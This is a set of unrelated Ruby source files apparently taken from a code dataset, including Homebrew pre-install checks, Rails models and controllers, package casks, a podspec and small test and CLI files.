        For PPC support, see: https://github.com/mistydemeo/tigerbrew
      EOS
    end

    # Fail fast when the Cellar or the prefix cannot be written to.
    def check_writable_install_location
      cellar_blocked = HOMEBREW_CELLAR.exist? && !HOMEBREW_CELLAR.writable_real?
      raise "Cannot write to #{HOMEBREW_CELLAR}" if cellar_blocked

      unless HOMEBREW_PREFIX.writable_real? || HOMEBREW_PREFIX.to_s == "/usr/local"
        raise "Cannot write to #{HOMEBREW_PREFIX}"
      end
    end

    # Run the fatal development-tool diagnostics (macOS only) and exit
    # non-zero if any of them reported a failure.
    def check_development_tools
      return unless OS.mac?

      checks = Diagnostic::Checks.new
      checks.fatal_development_tools_checks.each do |check_name|
        message = checks.send(check_name)
        ofail message unless message.nil?
      end
      exit 1 if Homebrew.failed?
    end

    # Ensure the Cellar directory exists, with a friendly permissions hint
    # when it cannot be created.
    def check_cellar
      FileUtils.mkdir_p(HOMEBREW_CELLAR) unless File.exist?(HOMEBREW_CELLAR)
    rescue
      raise <<~EOS
        Could not create #{HOMEBREW_CELLAR}
        Check you have permission to write to #{HOMEBREW_CELLAR.parent}
      EOS
    end

    # Symlink the dynamic linker, ld.so
    def symlink_ld_so
      ld_so = HOMEBREW_PREFIX/"lib/ld.so"
      return if ld_so.readable?

      candidates = [
        "/lib64/ld-linux-x86-64.so.2",
        "/lib/ld-linux.so.3",
        "/lib/ld-linux.so.2",
        "/lib/ld-linux-armhf.so.3",
        "/lib/ld-linux-aarch64.so.1",
        "/system/bin/linker",
      ]
      sys_interpreter = candidates.find { |candidate| Pathname.new(candidate).executable? }
      raise "Unable to locate the system's ld.so" unless sys_interpreter

      # Prefer glibc's own loader when the glibc formula is installed.
      interpreter = begin
        glibc = Formula["glibc"]
        glibc.installed? ? glibc.lib/"ld-linux-x86-64.so.2" : sys_interpreter
      rescue FormulaUnavailableError
        sys_interpreter
      end
      FileUtils.mkdir_p HOMEBREW_PREFIX/"lib"
      FileUtils.ln_sf interpreter, ld_so
    end

    # Symlink the host's compiler
    def symlink_host_gcc
      version = DevelopmentTools.non_apple_gcc_version "/usr/bin/gcc"
      return if version.null?

      # GCC < 5 is suffixed major.minor (e.g. gcc-4.9); newer just the major.
      suffix = (version < 5) ? version.to_s[/^\d+\.\d+/] : version.to_s[/^\d+/]
      return if File.executable?("/usr/bin/gcc-#{suffix}") || File.executable?(HOMEBREW_PREFIX/"bin/gcc-#{suffix}")

      FileUtils.mkdir_p HOMEBREW_PREFIX/"bin"
      %w[gcc g++ gfortran].each do |tool|
        source = "/usr/bin/#{tool}"
        dest = HOMEBREW_PREFIX/"bin/#{tool}-#{suffix}"
        next if !File.executable?(source) || File.executable?(dest)

        FileUtils.ln_sf source, dest
      end
    end

    # Entry point: run every applicable pre-install check and symlink step.
    def perform_preinstall_checks
      check_ppc
      check_writable_install_location
      check_development_tools if DevelopmentTools.installed?
      check_cellar
      return if OS.mac?

      symlink_ld_so
      symlink_host_gcc
    end
  end
end
| 30.545455 | 115 | 0.647156 |
acb2e67728e363515178d4fb43b198db9a25721a | 1,396 | # frozen_string_literal: true
module Arel # :nodoc: all
  module Nodes
    # IN / NOT IN predicate over a homogeneous list of values, letting the
    # owning attribute cast and quote the whole list in one batch.
    class HomogeneousIn < Node
      attr_reader :attribute, :values, :type

      def initialize(values, attribute, type)
        @values = values
        @attribute = attribute
        @type = type
      end

      def hash
        ivars.hash
      end

      # Equal when the superclass says so, or when class and internal state match.
      def eql?(other)
        return true if super

        self.class == other.class && ivars == other.ivars
      end
      alias :== :eql?

      def equality?
        true
      end

      # Flip between IN and NOT IN, keeping values and attribute.
      def invert
        flipped = (type == :in) ? :notin : :in
        Arel::Nodes::HomogeneousIn.new(values, attribute, flipped)
      end

      def left
        attribute
      end

      def right
        attribute.quoted_array(values)
      end

      def table_name
        attribute.relation.table_alias || attribute.relation.name
      end

      def column_name
        attribute.name
      end

      # Serialize each value through the attribute's type caster, dropping
      # entries the caster cannot serialize (and nil serializations).
      def casted_values
        caster = attribute.type_caster
        serialized = values.map do |raw|
          caster.serialize(raw) if caster.serializable?(raw)
        end
        serialized.compact
      end

      def fetch_attribute(&block)
        return yield(attribute) if attribute

        expr.fetch_attribute(&block)
      end

      protected
        def ivars
          [@attribute, @values, @type]
        end
    end
  end
end
| 19.123288 | 85 | 0.565186 |
919bdc7923f0cccb67fbb7b3f587b11a15b5b7c8 | 206 | class User < ApplicationRecord
  # Both email and username must be present and unique across users.
  validates :email, :username, uniqueness: true, presence: true
  # Username length is bounded; password only needs a minimum length.
  validates :username, length: { in: 4..15 }
  validates :password, presence: true, length: { minimum: 6 }
end
| 34.333333 | 63 | 0.718447 |
018770f86e0bf24b87df31d8c758ac7b956fd759 | 592 | module Hanuman
class Setting < ActiveRecord::Base
has_paper_trail
validates_uniqueness_of :key
def self.sort(sort_column, sort_direction)
order((sort_column + " " + sort_direction).gsub("asc asc", "asc").gsub("asc desc", "asc"))
end
def self.enable?(key)
k = find_by_key(key)
if k.blank?
false
else
k.value == 'true' ? true : false
end
end
def self.value(key)
k = find_by_key(key)
if k.blank?
"Setting not found for key: '" + key + "'!"
else
k.value
end
end
end
end
| 19.733333 | 96 | 0.565878 |
184508cb76de68d43cd39f06e0d00ea2b87333d4 | 20,505 | class TestPlansController < ApplicationController
# GET /test_plans
# GET /test_plans.xml
def index
# The index function is now a bit more complicated.
# The initial page lists all available products
# Opening the products should show a lis of test plans for the product
authorize! :read, TestPlan
# New test case is used by ability in view
# see bug... https://github.com/ryanb/cancan/issues/523
@test_plan = TestPlan.new
@products = current_user.products.order('name')
respond_to do |format|
format.html # index.html.erb
end
end
# GET /test_plans/1
# GET /test_plans/1.xml
def show
@test_plan = TestPlan.find(permitted_params[:id])
@comment = Comment.new(:test_plan_id => @test_plan.id, :comment => 'Enter a new comment')
authorize! :read, @test_plan
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
# Find the parent test case ID
parent_id = view_context.find_test_plan_parent_id(@test_plan)
# Find the list of related test case versions
@test_plans = TestPlan.where( "id = ? OR parent_id = ?", parent_id, parent_id ).where("id <> ?", @test_plan.id)
respond_to do |format|
format.html # show.html.erb
format.pdf do
pdf = PlanPdf.new(@test_plan, view_context)
send_data pdf.render, :filename => "plan_#{@test_plan.id}.pdf",
:type => "application/pdf",
:disposition => "inline"
end
format.rtf do
send_data generate_rtf(@test_plan), :filename => "plan_#{@test_plan.id}.rtf",
:type => "text/richtext",
:disposition => "inline"
end
end
end
# GET /test_plans/new
# GET /test_plans/new.xml
def new
@test_plan = TestPlan.new
# @test_cases = TestCase.all
@products = current_user.products.order('name')
authorize! :create, @test_plan
# Make a list of all applicable custom fields and add to the test case item
custom_fields = CustomField.where(:item_type => 'test_plan', :active => true)
custom_fields.each do |custom_field|
@test_plan.custom_items.build(:custom_field_id => custom_field.id)
end
respond_to do |format|
format.html # new.html.erb
end
end
# GET /test_plans/1/edit
def edit
@test_plan = TestPlan.find(permitted_params[:id])
@comment = Comment.new(:test_plan_id => @test_plan.id, :comment => 'Enter a new comment')
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
# If editing after assignment allowed or it is not assigned, start edit
if (Setting.value('Allow Test Plan Edit After Assignment') == true) or (Assignment.where(:test_plan_id => @test_plan.id).count < 1)
# @test_cases = TestCase.all
@products = current_user.products.order('name')
@plan_id = @test_plan.id
authorize! :update, @test_plan
# We need to make sure that all custom fields exist on this item. If not, we add them.
# Find all applicable custom fields
custom_fields = CustomField.where(:item_type => 'test_plan', :active => true)
custom_fields.each do |custom_field|
# If an entry for the current field doesn't exist, add it.
if @test_plan.custom_items.where(:custom_field_id => custom_field.id).first == nil
@test_plan.custom_items.build(:custom_field_id => custom_field.id)
end
end
#otherwise redirect to view page with warning
else
redirect_to @test_plan, :flash => {:warning => 'This test plan can not be edited. The plan has been assigned and editing assigned plans is disabled in the settings.'}
end
end
# POST /test_plans
# POST /test_plans.xml
def create
@test_plan = TestPlan.new(permitted_params[:test_plan])
@comment = Comment.new(:test_plan_id => @test_plan.id, :comment => 'Enter a new comment')
authorize! :create, @test_plan
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
# Set the created and modified by fields
@test_plan.created_by = current_user
@test_plan.modified_by = current_user
respond_to do |format|
if @test_plan.save
# Create item in log history
# Action type based on value from en.yaml
History.create(:test_plan_id => @test_plan.id, :action => 1, :user_id => current_user.id)
# Redirect based on button. IF they clicked SAve and Add Test cases, go to edit view
# Otherwise, load show page
if permitted_params[:commit] == "Save and Add Test Cases"
format.html { redirect_to(edit_test_plan_path(@test_plan), :notice => 'Test plan was successfully created. Please add cases.') }
else
format.html { redirect_to(@test_plan, :notice => 'Test plan was successfully created.') }
end
# If there was an error, return to the new page
else
@products = Product.all.order(:name)
format.html { render :action => "new" }
end
end
end
# PUT /test_plans/1
# PUT /test_plans/1.xml
def update
@test_plan = TestPlan.find(permitted_params[:id])
@comment = Comment.new(:test_plan_id => @test_plan.id, :comment => 'Enter a new comment')
authorize! :update, @test_plan
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
# Verify that if they change the product, it is changed to a product they have access to.
authorize_product!(Product.find(permitted_params[:test_plan][:product_id]))
# Set the created and modified by fields
@test_plan.modified_by = current_user
# The list of of test case IDs are provided in order
# Form is c=A&c=B&c=C...
# We strip the first two chars then split values.
# For each test case, we update the order number on Plan release
# We only do the update if there were changes. There are no changes
# when only removes or no changes made
if permitted_params['selectedCaseOrder'] != ""
orderNum = 1
permitted_params['selectedCaseOrder'][2..-1].split('&c=').each do |id|
plan_case = PlanCase.where(:test_case_id => id, :test_plan_id => @test_plan.id).first
plan_case.case_order = orderNum
plan_case.save
orderNum += 1
end
end
respond_to do |format|
if @test_plan.update_attributes(permitted_params[:test_plan])
#if @test_plan.save
# Create item in log history
# Action type based on value from en.yaml
History.create(:test_plan_id => @test_plan.id, :action => 2, :user_id => current_user.id)
format.html { redirect_to(@test_plan, :notice => 'Test plan was successfully updated.') }
else
@products = Product.all.order(:name)
@plan_id = @test_plan.id
format.html { render :action => "edit" }
end
end
end
# DELETE /test_plans/1
# DELETE /test_plans/1.xml
def destroy
@test_plan = TestPlan.find(permitted_params[:id])
authorize! :destroy, @test_plan
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
if ( Assignment.where(:test_plan_id => @test_plan.id).count > 0 )
redirect_to test_plans_url, :flash => {:warning => 'Can not delete. Test plan has already been assigned for testing.' }
else
@test_plan.destroy
# Create item in log history
# Action type based on value from en.yaml
History.create(:test_plan_id => @test_plan.id, :action => 3, :user_id => current_user.id)
respond_to do |format|
format.html { redirect_to(test_plans_path, :notice => 'Test plan was successfully deleted.') }
end
end
end
# GET /test_plans/copy/1
def copy
# begin
original_test_plan = TestPlan.find( permitted_params[:id] )
# Verify user can view this test case. Must be in his product
authorize_product!(original_test_plan.product)
@test_plan = original_test_plan.duplicate_plan
redirect_to edit_test_plan_path(@test_plan), :notice => "Test plan copied successfully"
# rescue
# redirect_to test_plans_path, :flash => {:warning => 'There was an error copying the test plan.'}
# end
end
# GET /test_plans/search/
def search
authorize! :read, TestPlan
# This is used for the simple search function.
# Note that this currently utlizes the search module that is contained within the model.
if permitted_params[:search]
# find(:all, :conditions => ['name LIKE ?', "%#{search}%"])
@test_plans = TestPlan.where(:product_id => current_user.products).where('name LIKE ?', "%#{params[:search]}%")
else
@test_plans = TestPlan.where(:product_id => current_user.products)
end
end
# get /test_plans/create_new_version/:id
def create_new_version
begin
original_test_plan = TestPlan.find( permitted_params[:id] )
# Verify user can view this test plan. Must be in his product
authorize_product!(original_test_plan.product)
# Find the parent test case ID
parent_id = view_context.find_test_plan_parent_id(original_test_plan)
# Find the current max version for this parent id
max_version = TestPlan.where( "id = ? OR parent_id = ?", parent_id, parent_id ).maximum(:version)
# clone the test case
@test_plan = original_test_plan.dup
# Remember to increate the version value
@test_plan.version = max_version + 1
@test_plan.parent_id = parent_id
if @test_plan.save
# Make a clone of each step for this test case
original_test_plan.plan_cases.each do |plan_case|
new_plan_case = plan_case.dup
new_plan_case.test_plan_id = @test_plan.id
new_plan_case.save
end
# Mark the earlier test case as deprecated
original_test_plan.deprecated = true
original_test_plan.save
redirect_to @test_plan, :notice => "Test plan versioned successfully"
else
redirect_to test_plans_path, :flash => {:warning => 'There was an error generating the new version.'}
end
rescue
redirect_to test_plans_path, :flash => {:warning => 'There was an error generating the new version.'}
end
end
# GET /test_plans/:plan_id/add_case/:id
# Call on test plan form to add a case to the selected case module
# Done this way to calculate product name, category path
def add_test_case
# Find the case then load the JS
@test_case = TestCase.find(permitted_params[:id])
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_case.product)
# We need to pass this on. Plan ID is required for figuring out if a case is already included
# in a test plan
@plan_id = permitted_params[:plan_id]
# Add the test case to the test plan
test_plan = TestPlan.find(@plan_id)
test_plan.test_cases << @test_case
respond_to do |format|
format.js
end
end
# GET /test_plans/:plan_id/remove_case/:id
# Call on test plan form to remove case from the selected case module
# Done this way to calculate product name, category path
# And actually remove item
def remove_test_case
# Find the case then load the JS
@test_case = TestCase.find(permitted_params[:id])
# We need to pass this on. Plan ID is required for figuring out if a case is already included
# in a test plan
@plan_id = permitted_params[:plan_id]
# Remove the test case from the test plan
test_plan = TestPlan.find(@plan_id)
test_plan.test_cases.delete @test_case
respond_to do |format|
format.js
end
end
# GET /test_plans/list/:product_id
def list
# This function takes a product ID and returns a list of test plans
# JS is returned.
# This new item is simple used to test if the user can create test plans
# There is a bug in cancan that prevents ?can TestPlan from working
# https://github.com/ryanb/cancan/issues/523
@test_plan = TestPlan.new
# Product ID is required for the JS
@product_id = permitted_params[:product_id]
# Verify user can view this test plan. Must be in his product
authorize_product!(Product.find(@product_id))
# Generate a list of the test plans for the product
@test_plans = TestPlan.where(:product_id => @product_id)
# First we insert the underline
#@newDivs= "<div class='rectangle' style='display: block'></div>"
#if testplans.empty?
# @newDivs += '<div class=\"treeNoData\">Product does not have any test plans</div>'
#else
# @newDivs += '<div class=\"treeNode\"><table class=\"treeTable\"'
# @newDivs += '<tr><th>Name</th><th>Description</th><th></th><th></th><th></th></tr>'
# testplans.each do |testplan|
# testPlanLink = '<a href=\"' + test_plan_path(testplan) + '\">' + testplan.name + '</a>'
# editLink = '<a href=\"' + edit_test_plan_path(testplan) + '\">Edit</a>'
# @newDivs += '<tr><td>' + testPlanLink + '</td><td>' + testplan.description + '</td><td>' + editLink + '</td></tr>'
# end
# @newDivs += '</table></div>'
#end
respond_to do |format|
format.js
end
end
# GET /test_plans/list/:product_id
def list_categories
# This function takes a product ID and returns a list of categories
# JS returned.
@categories = Category.where(product_id: permitted_params[:product_id]).order(:name)
# We need to pass this on. Plan ID is required for figuring out if a case is already included
# in a test plan
@plan_id = permitted_params[:plan_id]
# It seems unneccessary to get the product as it is related to the categories
# however, if there are no categories, we still need to know which product we're deling with
# so we retrieve the product for the display
@product = Product.find(permitted_params[:product_id])
# Verify user can view this test plan. Must be in his product
authorize_product!(@product)
respond_to do |format|
format.js
end
end
# GET /test_plans/list_children/:category_id
def list_category_children
# This function takes a category ID and returns a list of sub-categories and test cases
# JS is returned.
# Pass @category_id to the js view so it knows which div to add code to
@category_id = permitted_params[:category_id]
# We need to pass this on. Plan ID is required for figuring out if a case is already included
# in a test plan
@plan_id = permitted_params[:plan_id]
# Find all of the sub categories for this sub-category
@categories = Category.find(@category_id).categories
# Find all of the test cases for this category
@testcases = TestCase.where(:category_id => @category_id)
# Verify user can view this test case. Must be in his product
authorize_product!(Category.find(@category_id).generate_product)
respond_to do |format|
format.js
end
end
private
def generate_rtf(test_plan)
colours = [RTF::Colour.new(0, 0, 0),
RTF::Colour.new(255, 255, 255),
RTF::Colour.new(100, 100, 100)]
# Create the used styles.
styles = {}
styles['CS_TITLE'] = RTF::CharacterStyle.new
styles['CS_TITLE'].bold = true
styles['CS_TITLE'].font_size = 36
styles['CS_BOLD'] = RTF::CharacterStyle.new
styles['CS_BOLD'].bold = true
styles['CS_HEADER'] = RTF::CharacterStyle.new
styles['CS_HEADER'].bold = true
styles['CS_HEADER'].font_size = 28
styles['CS_TABLE_HEADER'] = RTF::CharacterStyle.new
styles['CS_TABLE_HEADER'].foreground = colours[1]
styles['PS_NORMAL'] = RTF::ParagraphStyle.new
styles['PS_NORMAL'].space_after = 300
styles['PS_TITLE'] = RTF::ParagraphStyle.new
styles['PS_TITLE'].space_before = 6000
styles['PS_TITLE'].space_after = 300
styles['PS_HEADER'] = RTF::ParagraphStyle.new
styles['PS_HEADER'].space_before = 100
styles['PS_HEADER'].space_after = 300
# Create the document
document = RTF::Document.new(RTF::Font.new(RTF::Font::ROMAN, 'Arial'))
# Create the title page
document.paragraph(styles['PS_TITLE']) do |p1|
p1.apply(styles['CS_TITLE']) << 'Test Plan: ' + test_plan.name
end
document.page_break()
# Create the test case list page
document.paragraph(styles['PS_HEADER']) do |p1|
p1.apply(styles['CS_HEADER']) << 'Test Plan Details'
end
# List test cases page
document.paragraph(styles['NORMAL']) do |p|
p.apply(styles['CS_BOLD']) << 'Title: '
p << test_plan.name
p.line_break
p.apply(styles['CS_BOLD']) << 'Description: '
p << test_plan.description
p.line_break
p.apply(styles['CS_BOLD']) << 'Version: '
p << test_plan.version.to_s
p.line_break
p.apply(styles['CS_BOLD']) << 'Product: '
p << test_plan.product.name
p.line_break
end
# Test Case Header
document.paragraph(styles['PS_HEADER']) do |p1|
p1.apply(styles['CS_HEADER']) << 'Test Cases'
end
# Create table of test cases
table = document.table(test_plan.test_cases.count + 1, 5, 1750, 1750, 1750, 1050, 3000 )
table.border_width = 5
table[0][0].shading_colour = colours[2]
table[0][0].apply(styles['CS_TABLE_HEADER']) << 'Name'
table[0][1].shading_colour = colours[2]
table[0][1].apply(styles['CS_TABLE_HEADER']) << 'Product'
table[0][2].shading_colour = colours[2]
table[0][2].apply(styles['CS_TABLE_HEADER']) << 'Category'
table[0][3].shading_colour = colours[2]
table[0][3].apply(styles['CS_TABLE_HEADER']) << 'Version'
table[0][4].shading_colour = colours[2]
table[0][4].apply(styles['CS_TABLE_HEADER']) << 'Description'
i = 1
test_plan.test_cases.order("case_order").each do | test_case|
table[i][0] << test_case.name
table[i][1] << test_case.product.name
table[i][2] << test_case.category.name
table[i][3] << test_case.version.to_s
table[i][4] << test_case.description
i = i + 1
end
document.line_break
# END OF TEST CASE TABLE
test_plan.test_cases.order("case_order").each do | test_case|
# IMportant. The page break start the test case.
# this is because, RTF fails to render properly if the last item in the document is a page break
# If it is at the end, there is a page break after the last comment.
document.page_break
document.paragraph(styles['NORMAL']) do |p|
p.apply(styles['CS_HEADER']) << 'Test Case: ' + test_case.name
p.line_break
p.apply(styles['CS_BOLD']) << 'Description: '
p << test_case.description
p.line_break
p.apply(styles['CS_BOLD']) << 'Version: '
p << test_case.version.to_s
p.line_break
p.apply(styles['CS_BOLD']) << 'Product: '
p << test_case.product.name
p.line_break
p.line_break
if test_case.steps.count == 0
p << 'There are no recorded steps for this test case.'
end
end
if test_case.steps.count > 0
table1 = document.table(test_case.steps.count + 1, 3, 600, 4000, 4000 )
table1.border_width = 5
table1[0][0].shading_colour = colours[2]
table1[0][0].apply(styles['CS_TABLE_HEADER']) << 'Step'
table1[0][1].shading_colour = colours[2]
table1[0][1].apply(styles['CS_TABLE_HEADER']) << 'Action'
table1[0][2].shading_colour = colours[2]
table1[0][2].apply(styles['CS_TABLE_HEADER']) << 'Expected Result'
i = 1
test_case.steps.each do |step|
table1[i][0] << i.to_s
table1[i][1] << step.action
if step.result == nil
table1[i][2] << ' '
else
table1[i][2] << step.result
end
i = i + 1
end
table1.to_rtf
end
end
document.to_rtf
end
end | 37.281818 | 172 | 0.640527 |
26f5666dc83ef64af4394f88029dbc0b46dc7c94 | 820 | class RexsterConsole < Formula
  homepage "https://github.com/tinkerpop/rexster/wiki"
  url "http://tinkerpop.com/downloads/rexster/rexster-console-2.6.0.zip"
  sha256 "5f3af7bfc95847e8efa28610b23e2c175c6d92c14e5f3a468b9476cb1f2dfe1e"

  bottle do
    cellar :any
    sha256 "affe578e75691159a7a850c8b144eaaabc58d8375d7172852069b951ddc88239" => :yosemite
    sha256 "17254b31620dc42f4ee9c49a7bba38a1506312939dcf8d2a54a16f1a6cafd2e6" => :mavericks
    sha256 "a9dd91d430d35af266e9298d3bae82445f6cbf0521cb615f5cbc854974b89308" => :mountain_lion
  end

  # Keep the payload in libexec and expose only the launcher script on PATH.
  def install
    libexec.install %w[lib doc]
    (libexec/"ext").mkpath
    (libexec/"bin").install "bin/rexster-console.sh" => "rexster-console"
    bin.install_symlink libexec/"bin/rexster-console"
  end

  # Smoke test: the console should at least print its help output.
  test do
    system "#{bin}/rexster-console", "-h"
  end
end
| 34.166667 | 95 | 0.769512 |
1caaff007ff27fcc4cd67dce878195bfb2dbabb0 | 177 | class AddIngredientsAndMethodToRecipe < ActiveRecord::Migration[5.1]
def change
add_column :recipes, :ingredients, :text
add_column :recipes, :method, :text
end
end
| 25.285714 | 68 | 0.751412 |
21bf1a87eb25e649bc29bc882de75111db6cdadf | 121 | require "disjoint_set_forest/version"
require "disjoint_set_forest/disjoint_set_forest"
module DisjointSetForest
end
| 17.285714 | 49 | 0.859504 |
e98ec3de5c715ffa2f5a11424738a5a8a79aaacb | 404 | require 'fastlane_core/ui/ui'
module Fastlane
UI = FastlaneCore::UI unless Fastlane.const_defined?("UI")
module Helper
class BundletoolHelper
# class methods that you define here become available in your action
# as `Helper::BundletoolHelper.your_method`
#
def self.show_message
UI.message("Hello from the bundletool plugin helper!")
end
end
end
end
| 23.764706 | 74 | 0.695545 |
91469ae975531a3628129d7582b6934c0a02733e | 609 | cask 'unity-linux-support-for-editor' do
version '2018.2.4f1,cb262d9ddeaf'
sha256 '0e333756d5ac328188f5f0c1e70f4a52c855b95638ac1de2d1b6c8b2d76c2ce8'
url "https://netstorage.unity3d.com/unity/#{version.after_comma}/MacEditorTargetInstaller/UnitySetup-Linux-Support-for-Editor-#{version.before_comma}.pkg"
appcast 'https://unity3d.com/get-unity/download/archive'
name 'Unity Linux Build Support'
homepage 'https://unity3d.com/unity/'
depends_on cask: 'unity'
pkg "UnitySetup-Linux-Support-for-Editor-#{version.before_comma}.pkg"
uninstall pkgutil: 'com.unity3d.LinuxStandaloneSupport'
end
| 38.0625 | 156 | 0.791461 |
1cf0b6dc46d9198a0c9764df9fb3ec28933775cb | 302 | class Ey::Core::Client::SslCertificates < Ey::Core::Collection
model Ey::Core::Client::SslCertificate
self.model_root = "ssl_certificate"
self.model_request = :get_ssl_certificate
self.collection_root = "ssl_certificates"
self.collection_request = :get_ssl_certificates
end
| 30.2 | 62 | 0.741722 |
3970b63cff00bc25a1f7d60728ba114f1c5a36c3 | 2,540 | Pod::Spec.new do |s|
s.name = 'IBMWatsonSpeechToTextV1'
s.version = '3.0.0'
s.summary = 'Client framework for the IBM Watson Speech to Text service'
s.description = <<-DESC
The IBM® Speech to Text leverages machine intelligence to transcribe the human voice accurately.
The service combines information about grammar and language structure with knowledge of the composition
of the audio signal. It continuously returns and retroactively updates a transcription as more speech is heard.
DESC
s.homepage = 'https://www.ibm.com/watson/services/speech-to-text/'
s.license = { :type => 'Apache License, Version 2.0', :file => 'LICENSE' }
s.authors = { 'Jeff Arn' => '[email protected]',
'Mike Kistler' => '[email protected]' }
s.module_name = 'SpeechToText'
s.ios.deployment_target = '10.0'
s.source = { :git => 'https://github.com/watson-developer-cloud/swift-sdk.git', :tag => s.version.to_s }
s.source_files = 'Source/SpeechToTextV1/**/*.swift',
'Source/SupportingFiles/InsecureConnection.swift',
'Source/SupportingFiles/Shared.swift',
'Source/SupportingFiles/Dependencies/Source/**/*'
s.exclude_files = 'Source/SpeechToTextV1/Shared.swift',
'**/config_types.h',
'**/opus_header.h',
'**/opus_header.c'
s.swift_version = ['4.2', '5.0', '5.1']
s.dependency 'IBMSwiftSDKCore', '~> 1.0.0'
s.dependency 'Starscream', '3.0.5'
s.vendored_libraries = 'Source/SupportingFiles/Dependencies/Libraries/*.a'
# The renaming of libogg.a and libopus.a is done to avoid duplicate library name errors
# in case TextToSpeech is being installed in the same app (which also includes libogg and libopus)
# The ogg/ and opus/ files are flattened to the same directory so that all #include statements work
s.prepare_command = <<-CMD
cd Source/SupportingFiles/Dependencies/Libraries
mv libogg.a libogg_stt.a
mv libopus.a libopus_stt.a
cd ../Source
mv ogg/* .
mv opus/* .
rm -rf ogg
rm -rf opus
CMD
end
| 51.836735 | 121 | 0.551969 |
bf61f9e58c47ee7ab1fadc2676601523c184caa9 | 1,025 | require 'abstract_unit'
class SafeBufferTest < ActiveSupport::TestCase
def setup
@buffer = ActiveSupport::SafeBuffer.new
end
test "Should look like a string" do
assert @buffer.is_a?(String)
assert_equal "", @buffer
end
test "Should escape a raw string which is passed to them" do
@buffer << "<script>"
assert_equal "<script>", @buffer
end
test "Should NOT escape a safe value passed to it" do
@buffer << "<script>".html_safe
assert_equal "<script>", @buffer
end
test "Should not mess with an innocuous string" do
@buffer << "Hello"
assert_equal "Hello", @buffer
end
test "Should not mess with a previously escape test" do
@buffer << ERB::Util.html_escape("<script>")
assert_equal "<script>", @buffer
end
test "Should be considered safe" do
assert @buffer.html_safe?
end
test "Should return a safe buffer when calling to_s" do
new_buffer = @buffer.to_s
assert_equal ActiveSupport::SafeBuffer, new_buffer.class
end
end
| 24.404762 | 62 | 0.68878 |
d52be119349d266f8b1af199745026d48027c18c | 273 | class TwitterUser < ActiveRecord::Base
has_many :tweets
def tweets_stale?
Time.new - self.tweets.last.updated_at >= 900
end
def fetch_tweets!
CLIENT.user_timeline(self.username).each do |tweet|
self.tweets.create(text: tweet.text)
end
end
end | 19.5 | 55 | 0.70696 |
87299dec1f45432e7d7d91d70e58e5baa1e7a47f | 62 | json.array!(
@posts,
partial: 'posts/post',
as: :post
)
| 10.333333 | 24 | 0.580645 |
ed6af755c052371c763362aaf989499297ba142e | 826 | module Catechism::Matchers
class Change < Struct.new(:operation, :negated, :subject)
attr_reader :expected_difference, :computed_difference
def by(expected_difference)
@expected_difference = expected_difference
raise failure_message unless valid?
end
def valid?
original_value = subject.call
operation.call
value_after_operation = subject.call
@computed_difference = value_after_operation - original_value
(computed_difference == expected_difference) ^ negated
end
def failure_message
if negated
"Expected subject not to change, but it changed by #{computed_difference}"
else
"Expected subject to change by #{expected_difference}, but it changed by #{computed_difference}"
end
end
end
end
| 30.592593 | 105 | 0.690073 |
bf734c57058cf24f817be79f4edd3a49e24f54c2 | 1,897 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.seconds.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 35.12963 | 85 | 0.762256 |
1c3ae0ccaab9096037b94018794d4f9534a75477 | 1,351 | require 'thor'
require 'csv'
module CtoD
class CLI < Thor
desc "export CSV DATABASE", "Export CSV data to DATABASE"
option :string_size, aliases:"-s", default:100
def export(from, to)
db = create_table(from, to)
db.export
puts "CSV data exported successfully."
end
desc "create_table CSV DATABASE", "Create a database table for CSV"
option :string_size, aliases:"-s", default:100
def create_table(from, to)
db = DB.new(from, to, string_size: options[:string_size])
if db.table_exists?
puts "Table '#{db.table_name}' exsist."
else
db.create_table
puts "Table '#{db.table_name}' created at #{db.uri}."
end
db
end
desc "table_columns CSV", "Show column name and type pairs for a table based on given CSV"
option :string_size, aliases:"-s", default:100
def table_columns(csv)
csv_data = CSV.table(csv, header_converters:->h{h.strip})
columns = DB.build_columns(csv_data, string_size: options[:string_size])
puts "\e[32mcolumn name\e[0m :type"
puts "----------------------------"
puts columns.map { |name_type| "\e[32m%s\e[0m :%s" % name_type }
end
desc "version", "Show CtoD version"
def version
puts "CtoD #{CtoD::VERSION} (c) 2013 kyoendo"
end
map "-v" => :version
end
end
| 30.704545 | 94 | 0.621762 |
d5b31799dce1836f9380587ebf3b159263c55c29 | 2,398 | # Adapted from https://github.com/Homebrew/homebrew-cask/blob/ef85fb108065ee36e0f8b4d0da9745c9ed5bde6b/Casks/libreoffice.rb
# Copyright © 2013, Paul Hinze & Contributors, released under the BSD 2-Clause License: https://github.com/Homebrew/homebrew-cask/blob/ef85fb108065ee36e0f8b4d0da9745c9ed5bde6b/LICENSE
# All rights reserved.
cask "libreoffice-prerelease" do
version "7.2.2.2"
sha256 "dc2fd0577e3ee4f99c79d235a6efcd8fecc7069d24090c4eaea69e0fad8245ae"
url "https://download.documentfoundation.org/libreoffice/testing/#{version.major_minor_patch}/mac/x86_64/LibreOffice_#{version}_MacOS_x86-64.dmg",
verified: "documentfoundation.org/"
name "LibreOffice"
desc "Free cross-platform office suite"
homepage "https://www.libreoffice.org/"
